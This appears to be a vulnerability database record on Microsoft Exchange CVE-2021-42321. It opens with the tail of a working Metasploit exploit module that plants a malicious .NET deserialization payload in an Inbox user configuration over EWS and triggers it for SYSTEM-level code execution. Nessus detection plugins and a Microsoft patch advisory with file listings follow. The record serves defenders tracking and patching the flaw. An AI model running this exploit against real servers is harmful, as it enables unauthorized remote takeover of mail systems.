on the Inbox folder.\n print_status('Deleting the user configuration object associated with Inbox folder...')\n xml_delete_inbox_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:DeleteUserConfiguration>\n <m:UserConfigurationName Name=\"ExtensionMasterTable\">\n <t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" />\n </m:UserConfigurationName>\n </m:DeleteUserConfiguration>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_delete_inbox_user_config,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}\n print_good('Successfully deleted the user configuration object associated with the Inbox folder!')\n else\n print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')\n print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')\n end\n\n # Now to replace the deleted user configuration object with our own user configuration object.\n print_status('Creating the malicious user configuration object on the Inbox folder!')\n\n xml_malicious_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:CreateUserConfiguration>\n <m:UserConfiguration>\n <t:UserConfigurationName Name=\"ExtensionMasterTable\">\n <t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" />\n </t:UserConfigurationName>\n <t:Dictionary>\n <t:DictionaryEntry>\n <t:DictionaryKey>\n <t:Type>String</t:Type>\n <t:Value>OrgChkTm</t:Value>\n </t:DictionaryKey>\n <t:DictionaryValue>\n <t:Type>Integer64</t:Type>\n <t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value>\n </t:DictionaryValue>\n </t:DictionaryEntry>\n <t:DictionaryEntry>\n <t:DictionaryKey>\n <t:Type>String</t:Type>\n <t:Value>OrgDO</t:Value>\n </t:DictionaryKey>\n <t:DictionaryValue>\n <t:Type>Boolean</t:Type>\n <t:Value>false</t:Value>\n </t:DictionaryValue>\n </t:DictionaryEntry>\n </t:Dictionary>\n <t:BinaryData>#{Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: @gadget_chain, formatter: :BinaryFormatter))}</t:BinaryData>\n </m:UserConfiguration>\n </m:CreateUserConfiguration>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_malicious_user_config,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}\n fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')\n end\n\n print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')\n\n # Deserialize our object. If all goes well, you should now have SYSTEM :)\n print_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...')\n xml_get_client_access_token = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:GetClientAccessToken>\n <m:TokenRequests>\n <t:TokenRequest>\n <t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id>\n <t:TokenType>CallerIdentity</t:TokenType>\n </t:TokenRequest>\n </m:TokenRequests>\n </m:GetClientAccessToken>\n </soap:Body>\n </soap:Envelope>)\n\n begin\n send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_get_client_access_token,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n rescue Errno::ECONNRESET\n # when using the DataSetTypeSpoof gadget, it's expected that this connection reset exception will be raised\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_chainedserializationbinder_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-03-07T15:34:34", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-41349, CVE-2021-42305)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-42321)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "Security Updates for Exchange (November 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41349", "CVE-2021-42305", "CVE-2021-42321"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_NOV_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/154999", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154999);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\"CVE-2021-41349\", \"CVE-2021-42305\", \"CVE-2021-42321\");\n script_xref(name:\"IAVA\", value:\"2021-A-0543-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"MSKB\", value:\"5007409\");\n script_xref(name:\"MSFT\", value:\"MS21-5007409\");\n\n script_name(english:\"Security Updates for Exchange (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-41349, CVE-2021-42305)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-42321)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007409\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5007409 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42321\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange Server ChainedSerializationBinder RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013', \n 'unsupported_cu' : 22, \n 'min_version': '15.0.1497.0', \n 'fixed_version': '15.0.1497.26'\n },\n {\n 'product' : '2016', \n 'unsupported_cu' : 20, \n 'min_version': '15.1.2308.0', \n 'fixed_version': '15.1.2308.20'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 20,\n 'min_version': '15.1.2375.0',\n 'fixed_version': '15.1.2375.17'\n },\n {\n 'product' : '2019', \n 'unsupported_cu' : 9,\n 'min_version': '15.2.922.0',\n 'fixed_version': '15.2.922.19'\n },\n {\n 'product' : '2019', \n 'unsupported' : 9,\n 'min_version': '15.2.986.0',\n 'fixed_version': '15.2.986.14'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report(\n app_info:app_info, \n bulletin:'MS21-11',\n constraints:constraints, \n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-07T15:36:26", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-41349, CVE-2021-42305)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-42321)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-09T00:00:00", "type": "nessus", "title": "Security Updates for Exchange (November 2021) (Remote)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41349", "CVE-2021-42305", "CVE-2021-42321"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_NOV_EXCHANGE_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/155962", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155962);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\"CVE-2021-41349\", \"CVE-2021-42305\", \"CVE-2021-42321\");\n script_xref(name:\"IAVA\", value:\"2021-A-0543-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"MSKB\", value:\"5007409\");\n script_xref(name:\"MSFT\", value:\"MS21-5007409\");\n\n script_name(english:\"Security Updates for Exchange (November 2021) (Remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-41349, CVE-2021-42305)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-42321)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007409\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5007409 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42321\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange Server ChainedSerializationBinder RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"exchange_detect.nbin\");\n script_require_keys(\"installed_sw/Exchange Server\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app = 'Exchange Server';\nvar app_info = vcf::get_app_info(app:app, port:port);\n\nif (report_paranoia < 2)\n vcf::check_granularity(app_info:app_info, sig_segments:4);\n\nvar constraints = [\n {'min_version' : '15.0.1497', 'fixed_version':'15.0.1497.26'},\n {'min_version' : '15.1.2375', 'fixed_version':'15.1.2375.17'},\n {'min_version' : '15.1.2308', 'fixed_version':'15.1.2308.20'},\n {'min_version' : '15.2.986', 'fixed_version':'15.2.986.14'},\n {'min_version' : '15.2.922', 'fixed_version':'15.2.922.19'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-03-15T10:47:27", "description": "None\nThis security update rollup resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2021-41349 | Microsoft Exchange Server Spoofing Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349>)\n * [CVE-2021-42305 | Microsoft Exchange Server Spoofing Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42305>)\n * [CVE-2021-42321 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321>)\n\n## Improvements in this update\n\n * The Exchange Server version number is now added to the HTTP response reply header. You can use this information to verify the security update status of Exchange-based servers in your network.\n\n## Known issues in this update\n\n * **Issue 1** \n \nWhen you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) might stop working. \n \nThis issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.\n\n**Note: **This issue does not occur if you install the update through Microsoft Update.\n\nTo avoid this issue, follow these steps to manually install this security update:\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\n * **Issue 2** \n \nExchange services might remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition might occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. \n \nTo fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\$v=ws.10\$.aspx>).\n * **Issue 3** \n \nWhen you block third-party cookies in a web browser, you might be continually prompted to trust a particular add-in even though you keep selecting the option to trust it. This issue occurs also in privacy window modes (such as InPrivate mode in Microsoft Edge). This issue occurs because browser restrictions prevent the response from being recorded. To record the response and enable the add-in, you must enable third-party cookies for the domain that's hosting OWA or Office Online Server in the browser settings. To enable this setting, refer to the specific support documentation for the browser.\n * **Issue 4** \n \nWhen you try to request free/busy information for a user in a different forest in a trusted cross-forest topology, the request fails and generates a \"(400) Bad Request\" error message. For more information and workarounds to this issue, see [\"(400) Bad Request\" error during Autodiscover for per-user free/busy in a trusted cross-forest topology](<https://support.microsoft.com/help/5003623>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5007012>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Exchange Server 2019 Cumulative Update 10 Security Update 3 (KB5007409)](<https://www.microsoft.com/download/details.aspx?familyid=1c42658f-9d60-4afb-a6c6-e35594b17d39>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Exchange Server 2019 Cumulative Update 11 Security Update 2 (KB5007409)](<https://www.microsoft.com/download/details.aspx?familyid=cd28ac6e-eb6f-4747-b9f0-24785b08a012>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Exchange Server 2016 Cumulative Update 22 Security Update 2 (KB5007409)](<https://www.microsoft.com/download/details.aspx?familyid=688b79c6-7e43-4332-848d-47e88f60818c>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Exchange Server 2016 Cumulative Update 21 Security Update 3 (KB5007409)](<https://www.microsoft.com/download/details.aspx?familyid=de4b96e0-8d0e-4830-8354-7ed2128e6f82>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Exchange Server 2013 Cumulative Update 23 Security Update 12 (KB5007409)](<https://www.microsoft.com/download/details.aspx?familyid=8ef4e237-7007-4e30-9525-75ae6e66bb41>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [November 9, 2021](<https://support.microsoft.com/help/5007403>).\n\n### Security update replacement information\n\nThis security update replaces the following previously released updates:\n\n * [Description of the security update for Microsoft Exchange Server 2019 and 2016: October 12, 2021 (KB5007012)](<https://support.microsoft.com/help/5007012>)\n * [Description of the security update for Microsoft Exchange Server 2013: October 12, 2021 (KB5007011)](<https://support.microsoft.com/help/5007011>)\n\n## File information\n\n### File hash information\n\nUpdate name| File name| SHA256 hash \n---|---|--- \nExchange Server 2019 CU11 SU2| Exchange2019-KB5007012-x64-en.msp| 1A1BB644ABE0C178F0CD3BDFE85D1342BE1FA2ED10DD4FC34A0CBE4B129CDAA0 \nExchange Server 2019 CU10 SU3| Exchange2019-KB5007012-x64-en.msp| 73DA8BD650E9733A38AF96DD778F99420F48141D4C3F6FB3454F2040B934FD9B \nExchange Server 2016 CU22 SU2| Exchange2016-KB5007012-x64-en.msp| 15D94E82BC208D20BB119E71CEC742E26F3AD86B4707B7E82BCDEAF4C00F0A36 \nExchange Server 2016 CU21 SU3| Exchange2016-KB5007012-x64-en.msp| F335CF5133DD0D1F00A4DF4234C533F85B985A657B99A87913CE3D83EAC1D37C \nExchange Server 2013 CU23 SU12| Exchange2013-KB5007409-x64-en.msp| 44174E35D85CD92B87B911E8C1081700CA0AFD6948FA8E245663A12AF2B6BBFD \n \n### Exchange Server file information\n\nThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n### \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 11 Security Update 2\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.986.11| 71,032| 3-Nov-21| 18:14| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,518| 3-Nov-21| 18:13| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,921| 3-Nov-21| 18:13| Not applicable \nAdemodule.dll| 15.2.986.11| 106,376| 3-Nov-21| 18:13| x64 \nAirfilter.dll| 15.2.986.11| 42,888| 3-Nov-21| 18:13| x64 \nAjaxcontroltoolkit.dll| 15.2.986.13| 92,560| 3-Nov-21| 18:11| x86 \nAntispamcommon.ps1| Not applicable| 13,481| 3-Nov-21| 18:13| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 3-Nov-21| 18:19| Not applicable \nAsentirs.msi| Not applicable| 77,824| 3-Nov-21| 18:19| Not applicable \nAsentsig.msi| Not applicable| 73,728| 3-Nov-21| 18:13| Not applicable \nBigfunnel.bondtypes.dll| 15.2.986.11| 45,440| 3-Nov-21| 18:11| x86 \nBigfunnel.common.dll| 15.2.986.11| 66,448| 3-Nov-21| 18:11| x86 \nBigfunnel.configuration.dll| 15.2.986.14| 118,136| 3-Nov-21| 18:23| x86 \nBigfunnel.entropy.dll| 15.2.986.11| 44,432| 3-Nov-21| 18:11| x86 \nBigfunnel.filter.dll| 15.2.986.11| 54,144| 3-Nov-21| 18:11| x86 \nBigfunnel.indexstream.dll| 15.2.986.13| 69,008| 3-Nov-21| 18:11| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,160| 3-Nov-21| 18:13| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.986.13| 19,848| 3-Nov-21| 18:14| x86 \nBigfunnel.poi.dll| 15.2.986.11| 243,600| 3-Nov-21| 18:11| x86 \nBigfunnel.postinglist.dll| 15.2.986.13| 188,808| 3-Nov-21| 18:11| x86 \nBigfunnel.query.dll| 15.2.986.11| 101,256| 3-Nov-21| 18:11| x86 \nBigfunnel.ranking.dll| 15.2.986.13| 109,456| 3-Nov-21| 18:13| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.986.11| 3,634,552| 3-Nov-21| 18:13| x86 \nBigfunnel.tracing.dll| 15.2.986.11| 42,888| 3-Nov-21| 18:13| x86 \nBigfunnel.wordbreakers.dll| 15.2.986.11| 46,456| 3-Nov-21| 18:13| x86 \nCafe_airfilter_dll| 15.2.986.11| 42,888| 3-Nov-21| 18:13| x64 \nCafe_exppw_dll| 15.2.986.11| 83,328| 3-Nov-21| 18:13| x64 \nCafe_owaauth_dll| 15.2.986.11| 92,024| 3-Nov-21| 18:18| x64 \nCalcalculation.ps1| Not applicable| 42,109| 3-Nov-21| 18:14| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,638| 3-Nov-21| 18:11| Not applicable \nChksgfiles.dll| 15.2.986.11| 57,216| 3-Nov-21| 18:13| x64 \nCitsconstants.ps1| Not applicable| 15,797| 3-Nov-21| 18:13| Not applicable \nCitslibrary.ps1| Not applicable| 82,660| 3-Nov-21| 18:13| Not applicable \nCitstypes.ps1| Not applicable| 14,472| 3-Nov-21| 18:13| Not applicable \nClassificationengine_mce| 15.2.986.11| 1,693,056| 3-Nov-21| 18:13| Not applicable \nClusmsg.dll| 15.2.986.11| 134,008| 3-Nov-21| 18:14| x64 \nCoconet.dll| 15.2.986.11| 48,008| 3-Nov-21| 18:13| x64 \nCollectovermetrics.ps1| Not applicable| 81,656| 3-Nov-21| 18:11| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,882| 3-Nov-21| 18:11| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,963| 3-Nov-21| 20:40| Not applicable \nComplianceauditservice.exe| 15.2.986.14| 39,824| 3-Nov-21| 20:44| x86 \nConfigureadam.ps1| Not applicable| 22,776| 3-Nov-21| 18:13| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,320| 3-Nov-21| 18:11| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,031| 3-Nov-21| 18:14| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,778| 3-Nov-21| 18:11| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,824| 3-Nov-21| 18:13| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,291| 3-Nov-21| 18:11| Not applicable \nConnectfunctions.ps1| Not applicable| 37,157| 3-Nov-21| 20:40| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,432| 3-Nov-21| 20:40| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,244| 3-Nov-21| 20:24| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,045| 3-Nov-21| 18:11| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,540| 3-Nov-21| 18:13| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,777| 3-Nov-21| 18:13| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,904| 3-Nov-21| 18:11| Not applicable 